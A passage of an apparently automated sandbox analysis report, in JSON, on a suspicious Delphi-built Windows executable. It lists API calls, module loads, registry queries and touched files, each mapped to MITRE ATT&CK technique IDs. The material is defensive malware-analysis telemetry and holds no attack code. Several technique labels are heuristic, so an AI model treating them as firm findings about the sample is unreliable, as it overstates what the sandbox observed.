loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 71f70000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004288)\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004288)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e9471@advapi32.dll\"\n \"0e000f00703f9471@advapi32.dll\"\n \"0e000f00cc3f9471@advapi32.dll\"\n \"11001200b4479471@advapi32.dll\"\n \"1100120048489471@advapi32.dll\"\n \"120013008c489471@advapi32.dll\"\n \"12001300e4489471@advapi32.dll\"\n \"14001500386e9471@advapi32.dll\"\n \"14001500506e9471@advapi32.dll\"\n \"14001500686e9471@advapi32.dll\"\n \"17001800806e9471@advapi32.dll\"\n \"0d000e00986e9471@advapi32.dll\"\n \"11001200a86e9471@advapi32.dll\"\n \"11001200bc6e9471@advapi32.dll\"\n \"0d000e0034499471@shell32.dll\"\n \"0d000e00b0499471@shell32.dll\"\n \"0f001000fc6f9471@advapi32.dll\"\n \"140015003c709471@advapi32.dll\"\n \"1400150054709471@advapi32.dll\"\n \"0c000d009c709471@advapi32.dll\"\n \"0c000d00ac709471@advapi32.dll\"\n \"0e000f00bc709471@advapi32.dll\"\n \"0e000f00cc709471@advapi32.dll\"\n \"0b000c00dc709471@advapi32.dll\"\n \"1800190014739471@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75540000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has an executable section named \"CODE\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has an writable section named \"DATA\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has an writable section named \"BSS\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has an writable section named \".idata\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-103", "type": 1, "relevance": 3, "name": "Contains ability to delay the execution of current thread", "description": "WaitForSingleObject@KERNEL32.DLL at 00000000-00004288-37135-28-00404E44\n WaitForSingleObject@KERNEL32.DLL at 00000000-00004288-37135-44-00404FF0", "origin": "Hybrid Analysis Technology", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" was detected as \"Borland Delphi 6.0 - 7.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-19", "relevance": 10, "name": "Found Delphi 4 - Delphi 2006 artifact", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has a PE timestamp using the buggy magic timestamp 0x2A425E19.", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\SspiCli.dll\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\system32\\SspiCli.dll\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"07325C3843D26C9D43E9CB4D41ED3F0C24D9B5AAF4E3A27067EA481504343BA1\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1.exe\" (Access type: \"QUERYVAL\"; Path: 